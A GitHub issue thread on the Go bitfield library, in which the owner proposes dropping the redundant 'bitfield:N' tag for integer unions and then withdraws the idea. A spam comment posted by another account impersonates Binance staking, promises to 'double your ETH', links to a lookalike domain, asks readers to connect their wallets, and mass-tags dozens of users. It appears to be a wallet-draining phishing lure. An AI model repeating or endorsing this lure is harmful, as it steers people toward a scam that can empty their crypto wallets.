### ISSUE TITLE
[enhancement] could omit bitfield=N struct tag for unions of integer types without bitfield

### ISSUE THREAD

**Issue by arl** [arl/bitfield#2]
To declare the Go equivalent of:

```c
union MyType
{
    u8 A;
    u16 B;
    u32 C;
};
```

We now have to write:

```go
type MyType struct {
	A uint8  `bitfield:"8,union=a"`
	B uint16 `bitfield:"16,union=b"`
	C uint32 `bitfield:"32,union=c"`
}
```

Here `bitfield=N` is redundant, so we could allow:

```go
type MyType struct {
	A uint8  `bitfield:"union=a"`
	B uint16 `bitfield:"union=b"`
	C uint32 `bitfield:"union=c"`
}
```

**Comment by arl** [comment]
after thinking more about it since is not interesting enough

**Comment by DavidMStraub** [comment]
## 🚀 Double Your ETH with Binance Staking

Earn rewards and secure your financial future by staking your ETH with Binance. By participating in the Binance staking program, you can potentially double your ETH while supporting the blockchain network.

[![Start Staking Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*Ssf-ZH2f2V5dLyn7zYTXHg.png)](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github)

**Click the banner above** to learn more and start staking your ETH with Binance today!

### How to Stake on Binance:
1. **[Visit the Official Binance Staking Page](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github):** Click the link to navigate to the official staking page.
2. **Connect Your Wallet:** Ensure you have a wallet with sufficient ETH, then securely connect it to Binance.
3. **Interact with the Staking Method:** Follow the instructions to use the "connect" method and begin staking your ETH from your wallet balance.
janjira7, @smartmech37, @Mepond, @Igor-bit15, @jodacame, @Gerard19742608jourdain, @wauefiq, @alaa-alshaikh, @JanD4rk, @riaanjvos, @sherwyn11, @HallCheng, @pabloserranof, @susyimes, @cesargerardoromo, @immense055, @Sagi1521, @codehunt023, @gauravssnl, @liqy, @George2181, @indiascope, @doongo, @jackyglony, @jffernandez, @Jokereng, @jackTang11, @tvews8z, @hoangchungk53qx1, @alvarlaigna, @qdsfdhvh, @farbod-s, @piltrisur, @rqiu25, @mbarek1, @UserWang, @Elli23, @EbenezerGH, @cuongpm, @zhangrui49, @droplet-js, @why168, @Husler007, @lijing01, @dempsey, @msya, @Ttatum87, @kristovatlas, @Dhewdhew, @yibulaxi
